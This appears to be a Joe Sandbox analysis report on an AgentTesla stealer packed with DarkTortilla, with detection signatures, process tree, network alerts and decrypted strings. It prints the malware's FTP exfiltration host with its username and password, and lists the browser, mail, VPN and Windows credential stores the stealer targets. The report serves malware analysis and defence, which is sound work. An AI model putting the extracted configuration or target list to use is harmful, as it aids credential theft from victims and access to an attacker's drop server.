Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xc501VOacR.exe

Overview

General Information

Sample name:Xc501VOacR.exe
renamed because original name is a hash value
Original sample name:61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c.exe
Analysis ID:1569282
MD5:08939a7fe1905c0c6e321e4e2cd90cad
SHA1:c463953c5f52e9bc0137513d69aa9294d84bde75
SHA256:61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Xc501VOacR.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\Xc501VOacR.exe" MD5: 08939A7FE1905C0C6E321E4E2CD90CAD)
    • InstallUtil.exe (PID: 3924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
        00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 11 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Xc501VOacR.exe.3fead3a.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.Xc501VOacR.exe.3fead3a.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.Xc501VOacR.exe.3f9778a.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.Xc501VOacR.exe.3fc126a.0.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 12 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:23:33.528204+010020299271A Network Trojan was detected192.168.2.549830162.241.203.3021TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:23:34.458512+010028555421A Network Trojan was detected192.168.2.549839162.241.203.3031261TCP
                        2024-12-05T17:23:34.578813+010028555421A Network Trojan was detected192.168.2.549839162.241.203.3031261TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: Xc501VOacR.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: http://ftp.aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Source: http://aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
                        Multi AV Scanner detection for submitted file
                        Source: Xc501VOacR.exeReversingLabs: Detection: 73%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for sample
                        Source: Xc501VOacR.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: /log.tmp
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .html
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .html
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>[
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ]<br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .html
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .zip
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Time:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>User Name:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>CPU:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>RAM:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IP Address:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <hr>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: New
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IP Address:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: true
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ftp://ftp.aminhacorretora.com.br
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: logsftp@aminhacorretora.com.br
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: _yA=,M5*J?KH
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: appdata
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: XVWmeW
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: XVWmeW.exe
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: XVWmeW
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Type
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <hr>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <b>[
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ]</b> (
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: )<br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {BACK}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ALT+F4}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {TAB}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ESC}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {Win}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYUP}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {DEL}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {END}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {HOME}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {Insert}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {NumLock}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {PageDown}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {PageUp}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ENTER}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F1}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F2}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F3}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F4}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F5}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F6}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F7}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F8}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F9}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F10}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F11}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F12}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: control
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {CTRL}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &amp;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &lt;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &gt;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &quot;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <hr>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: logins
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IE/Edge
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Secure Note
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Web Credentials
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Credentials
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SchemaId
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pResourceElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pIdentityElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pPackageSid
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IE/Edge
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UC Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UCBrowser\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Login Data
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: journal
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: wow_logins
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Safari for Windows
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <array>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <dict>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <data>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </data>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: QQ Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Profile
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: entries
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: category
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: str3
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: str2
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: blob0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password_value
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IncrediMail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PopPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmtpPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Accounts_New
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PopPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmtpPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmtpServer
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: EmailAddress
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Eudora
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: current
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Settings
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SavePasswordText
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Settings
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ReturnAddress
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Falkon Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: profiles.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: profiles.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \browsedata.db
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: autofill
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ClawsMail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Claws-mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \clawsrc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \clawsrc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passkey0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \accountrc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: smtp_server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: address
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: account
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \passwordstorerc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Flock Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: signons3.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: DynDns
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: username=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: t6KzXhCh
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: global
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: accounts
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: account.
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: username
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: account.
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Psi/Psi+
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: name
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Psi/Psi+
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Psi\profiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \accounts.xml
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \accounts.xml
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: OpenVPN
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: username
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: auth-data
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: entropy
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: USERPROFILE
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: remote
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: remote
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: NordVPN
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: NordVPN
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: user.config
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: NordVPN
